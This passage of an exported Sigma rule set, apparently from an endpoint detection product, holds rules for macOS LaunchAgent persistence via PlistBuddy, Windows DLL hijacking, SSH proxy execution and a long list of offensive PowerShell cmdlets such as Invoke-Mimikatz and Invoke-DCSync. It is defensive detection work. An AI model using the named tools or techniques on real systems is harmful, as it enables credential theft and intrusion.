"id": "f0dd8f4a-34b8-4bcf-b96d-74a3c8cd741b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617463Z",
"creation_date": "2026-03-23T11:45:34.617465Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617469Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/",
"https://attack.mitre.org/techniques/T1543/001/"
],
"name": "t1543_001_plistbuddy_add_launchagent.yml",
"content": "title: Launch Agent Created via PlistBuddy\nid: f0dd8f4a-34b8-4bcf-b96d-74a3c8cd741b\ndescription: |\n Detects a Launch Agent being created by PlistBuddy.\n PlistBuddy is a utility to easily create plist files via commandline.\n Attackers can manually craft malicious launch agents in plist files to achieve persistence.\n It is recommended to investigate the content of the plist file to determine whether this action was legitimate.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/\n - https://attack.mitre.org/techniques/T1543/001/\ndate: 2024/06/12\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_plistbuddy:\n Image|contains: 'PlistBuddy'\n\n selection_launch_agent:\n CommandLine|contains: 'LaunchAgents'\n\n selection_runatload:\n CommandLine|contains:\n - 'RunAtLoad bool true'\n - 'RunAtLoad bool yes'\n\n exclusion_onedrive:\n CommandLine: '/usr/libexec/PlistBuddy -c clear dict -c Add :Label string \"com.microsoft.OneDriveStandaloneUpdater\" -c Add :ProgramArguments array -c Add :Program string \"/Applications/OneDrive.app/Contents/StandaloneUpdater.app/Contents/MacOS/OneDriveStandaloneUpdater\" -c Add :RunAtLoad bool YES -c Add :StartInterval integer 86400 /Library/LaunchAgents/com.microsoft.OneDriveStandaloneUpdater.plist'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0dd8f4a-34b8-4bcf-b96d-74a3c8cd741b",
"rule_name": "Launch Agent Created via PlistBuddy",
"rule_description": "Detects a Launch Agent being created by PlistBuddy.\nPlistBuddy is a utility to easily create plist files via commandline.\nAttackers can manually craft malicious launch agents in plist files to achieve persistence.\nIt is recommended to investigate the content of the plist file to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-12",
"rule_modified_date": "2025-01-28",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1195"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0e116a0-82c7-4f59-9926-b9039668d557",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095242Z",
"creation_date": "2026-03-23T11:45:34.095244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095248Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_driverquery.yml",
"content": "title: DLL Hijacking via driverquery.exe\nid: f0e116a0-82c7-4f59-9926-b9039668d557\ndescription: |\n Detects potential Windows DLL Hijacking via driverquery.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'driverquery.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0e116a0-82c7-4f59-9926-b9039668d557",
"rule_name": "DLL Hijacking via driverquery.exe",
"rule_description": "Detects potential Windows DLL Hijacking via driverquery.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0e577e7-880f-48f0-8935-8641065e0641",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091760Z",
"creation_date": "2026-03-23T11:45:34.091762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091766Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wiaacmgr.yml",
"content": "title: DLL Hijacking via wiaacmgr.exe\nid: f0e577e7-880f-48f0-8935-8641065e0641\ndescription: |\n Detects potential Windows DLL Hijacking via wiaacmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wiaacmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ScanSetting.DLL'\n - '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0e577e7-880f-48f0-8935-8641065e0641",
"rule_name": "DLL Hijacking via wiaacmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wiaacmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0ff7dfb-0cc8-467d-9c26-c8096c156e3d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070036Z",
"creation_date": "2026-03-23T11:45:34.070038Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070043Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cyble.com/blog/a-stealthy-playbook-for-advanced-cyber-attacks/",
"https://x.com/salmanvsf/status/1901517210260062360",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_suspicious_ssh_command.yml",
"content": "title: Suspicious SSH Command Executed\nid: f0ff7dfb-0cc8-467d-9c26-c8096c156e3d\ndescription: |\n Detects a suspicious execution of ssh.exe as a proxy to launch another application.\n This pattern is frequently observed in phishing attacks that use a malicious link file (.LNK) to deploy stealers.\n This technique can be used to bypass defensive measures.\n It is recommended to investigate the execution context and surrounding detections to assess whether the execution of ssh.exe is linked with malicious activity.\nreferences:\n - https://cyble.com/blog/a-stealthy-playbook-for-advanced-cyber-attacks/\n - https://x.com/salmanvsf/status/1901517210260062360\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2025/03/24\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_proxycommand:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n - '\\mshta.exe'\n ParentImage: '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n ParentCommandLine|contains: 'ProxyCommand='\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n selection_localcommand:\n ParentImage: '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n ParentCommandLine|contains|all:\n - 'PermitLocalCommand=yes'\n - 'LocalCommand='\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0ff7dfb-0cc8-467d-9c26-c8096c156e3d",
"rule_name": "Suspicious SSH Command Executed",
"rule_description": "Detects a suspicious execution of ssh.exe as a proxy to launch another application.\nThis pattern is frequently observed in phishing attacks that use a malicious link file (.LNK) to deploy stealers.\nThis technique can be used to bypass defensive measures.\nIt is recommended to investigate the execution context and surrounding detections to assess whether the execution of ssh.exe is linked with malicious activity.\n",
"rule_creation_date": "2025-03-24",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f12ef755-160a-445e-8d4a-cca0c355beca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608396Z",
"creation_date": "2026-03-23T11:45:34.608399Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608407Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Inveigh",
"https://gist.github.com/monoxgas/9d238accd969550136db",
"https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1",
"https://github.com/secmode/Invoke-Apex",
"https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts",
"https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf",
"https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1",
"https://github.com/danielbohannon/Invoke-CradleCrafter",
"https://github.com/AlsidOfficial/WSUSpendu",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_script.yml",
"content": "title: Malicious PowerShell Commandlets\nid: f12ef755-160a-445e-8d4a-cca0c355beca\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with online repositories containing attack codes to perform memory-only attacks.\n Attackers can use off-the-shelf malicious PowerShell scripts to perform various actions on the infected hosts such as discovery, establish persistence, or exploit vulnerabilities.\n It is recommended to investigate the detected PowerShell script to look for malicious content, as well as other actions taken by the PowerShell process and its ancestors.\nreferences:\n - https://github.com/Kevin-Robertson/Inveigh\n - https://gist.github.com/monoxgas/9d238accd969550136db\n - https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1\n - https://github.com/secmode/Invoke-Apex\n - https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts\n - https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf\n - https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - https://github.com/danielbohannon/Invoke-CradleCrafter\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1562.001\n - attack.t1562.006\n - attack.collection\n - attack.t1125\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Invoke-Inveigh'\n - 'Invoke-DCSync'\n - 'Invoke-InveighRelay'\n - 'Invoke-PsExec'\n # - 'Invoke-SSHCommand' # too many FP\n - 'Invoke-SMBScanner'\n - 'Invoke-TimeStomp'\n - 'Invoke-Creds'\n - 'Invoke-UACBypass'\n - 'Invoke-Exfil'\n - 'Invoke-Persistence'\n - 'Invoke-Privesc'\n - 'Invoke-Obfuscation'\n - 'Invoke-AmsiBypass'\n - 'Invoke-CradleCrafter'\n - 'Take-Screenshot'\n - 'Invoke-ADPasswordBruteForce'\n - 'Remote-WmiExecute'\n - 'Remote-RegisterProtocolHandler'\n - 'timestomp'\n - 'PowerDump'\n - 'Start-Eidolon'\n - 'Out-CradleContents'\n - 'Invoke-OutCradle'\n - 'Out-Cradle'\n - 'Wsuspendu'\n - 'Invoke-Mimikatz'\n - 'VolumeShadowCopyTools'\n - 'Get-Unconstrained'\n - 'Check-VM'\n - 'Get-IndexedItem'\n - 'Invoke-RunAs'\n - 'MailRaider'\n - 'Invoke-ThunderStruck'\n - 'Invoke-VoiceTroll'\n - 'Get-SecurityPackages'\n - 'Get-RickAstley'\n - 'Find-Fruit'\n - 'HTTP-Login'\n - 'Find-TrustedDocuments'\n - 'Invoke-BadPotato'\n - 'Invoke-BetterSafetyKatz'\n - 'Invoke-Carbuncle'\n - 'Invoke-Certify'\n - 'Invoke-DAFT'\n - 'Invoke-DinvokeKatz'\n - 'Invoke-Eyewitness'\n - 'Invoke-FakeLogonScreen'\n - 'Invoke-Farmer'\n - 'Invoke-Get-RBCD-Threaded'\n - 'Invoke-Gopher'\n - 'Invoke-Grouper' # cover Invoke-GrouperX\n - 'Invoke-HandleKatz'\n - 'Invoke-Internalmonologue'\n - 'Invoke-KrbRelay'\n - 'Invoke-LdapSignCheck'\n - 'Invoke-Lockless'\n - 'Invoke-MITM6'\n - 'Invoke-MalSCCM'\n - 'Invoke-NanoDump'\n - 'Invoke-OxidResolver'\n - 'Invoke-P0wnedshell'\n - 'Invoke-PPLDump'\n - 'Invoke-Rubeus'\n - 'Invoke-SCShell'\n - 'Invoke-SafetyKatz'\n - 'Invoke-SauronEye'\n - 'Invoke-Seatbelt'\n - 'Invoke-ShadowSpray'\n - 'Invoke-SharPersist'\n - 'Invoke-SharpAllowedToAct'\n - 'Invoke-SharpBlock'\n - 'Invoke-SharpBypassUAC'\n - 'Invoke-SharpChromium'\n - 'Invoke-SharpClipboard'\n - 'Invoke-SharpCloud'\n - 'Invoke-SharpDPAPI'\n - 'Invoke-SharpDump'\n - 'Invoke-SharpGPO-RemoteAccessPolicies'\n - 'Invoke-SharpGPOAbuse'\n - 'Invoke-SharpHandler'\n - 'Invoke-SharpHide'\n - 'Invoke-SharpImpersonation'\n - 'Invoke-SharpImpersonationNoSpace'\n - 'Invoke-SharpKatz'\n - 'Invoke-SharpLdapRelayScan'\n - 'Invoke-SharpLoginPrompt'\n - 'Invoke-SharpMove'\n - 'Invoke-SharpPrintNightmare'\n - 'Invoke-SharpPrinter'\n - 'Invoke-SharpRDP'\n - 'Invoke-SharpSCCM'\n - 'Invoke-SharpSSDP'\n - 'Invoke-SharpSecDump'\n - 'Invoke-SharpSniper'\n - 'Invoke-SharpSploit'\n - 'Invoke-SharpSpray'\n - 'Invoke-SharpStay'\n - 'Invoke-SharpUp'\n - 'Invoke-SharpWSUS'\n - 'Invoke-SharpWatson'\n - 'Invoke-Sharphound' # cover Invoke-SharpHound2, Invoke-SharpHound3,.\n - 'Invoke-Sharplocker'\n - 'Invoke-Sharpshares'\n - 'Invoke-Sharpview'\n - 'Invoke-Sharpweb'\n - 'Invoke-Snaffler'\n - 'Invoke-Spoolsample'\n - 'Invoke-StandIn'\n - 'Invoke-StickyNotesExtract'\n - 'Invoke-TotalExec'\n - 'Invoke-Thunderfox'\n - 'Invoke-Tokenvator'\n - 'Invoke-UrbanBishop'\n - 'Invoke-Whisker'\n - 'Invoke-WireTap'\n - 'Invoke-winPEAS'\n - 'Invoke-Zerologon'\n - 'Get-USBKeystrokes'\n - 'Start-WebcamRecorder'\n - 'Invoke-OfficeScrape'\n - 'Invoke-DomainPasswordSpray'\n - 'Invoke-SpraySinglePassword'\n\n exclusion_posh_ssh:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\Posh-SSH\\2.2\\Posh-SSH.psd1\n # C:\\Users\\xxxx\\Documents\\WindowsPowerShell\\Modules\\Posh-SSH\\3.0.6\\Posh-SSH.psm1\n PowershellScriptPath: '*\\WindowsPowerShell\\Modules\\Posh-SSH*'\n PowershellCommand|contains:\n - 'Invoke-SSHCommandStream'\n - 'function Invoke-SSHCommand'\n\n exclusion_gehealthcare:\n # seen: modules\\utility , modules\\installpackages , modules\\deployment\n PowershellScriptPath:\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\\\*'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\\\*'\n\n exclusion_sdiag:\n PowershellScriptPath: '?:\\WINDOWS\\TEMP\\SDIAG_*\\\\*.ps1'\n\n exclusion_sentinel_one:\n PowershellCommand|contains|all:\n - ':::::\\windows\\sentinel'\n - '<#sentinelbreakpoints#>'\n - 'Set-PSBreakpoint'\n\n exclusion_boxstarter:\n PowershellScriptPath: '?:\\ProgramData\\Boxstarter\\Boxstarter.Chocolatey\\Install-BoxstarterPackage.ps1'\n\n exclusion_utiladmin:\n PowershellCommand|contains|all:\n - '# Name'\n - ': UtilAdmin-?.?.ps1'\n - '# Author'\n - ': Philippe Conseil'\n\n exclusion_agicorp:\n PowershellScriptPath: '?:\\Program Files (x86)\\AgiCorp\\\\*.ps1'\n\n exclusion_vmware_vcenter:\n PowershellCommand|contains|all:\n - 'Check-VM'\n - '-Vcenter'\n - '-Cluster'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f12ef755-160a-445e-8d4a-cca0c355beca",
"rule_name": "Malicious PowerShell Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with online repositories containing attack codes to perform memory-only attacks.\nAttackers can use off-the-shelf malicious PowerShell scripts to perform various actions on the infected hosts such as discovery, establish persistence, or exploit vulnerabilities.\nIt is recommended to investigate the detected PowerShell script to look for malicious content, as well as other actions taken by the PowerShell process and its ancestors.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1125",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f1306b77-a489-459c-9b75-ef762e3417b8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598687Z",
"creation_date": "2026-03-23T11:45:34.598690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598698Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitsadmin.yml",
"content": "title: DLL Hijacking via bitsadmin.exe\nid: f1306b77-a489-459c-9b75-ef762e3417b8\ndescription: |\n Detects potential Windows DLL Hijacking via bitsadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bitsadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f1306b77-a489-459c-9b75-ef762e3417b8",
"rule_name": "DLL Hijacking via bitsadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bitsadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f15da969-0fe2-4ed7-ac79-667f3384fed2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
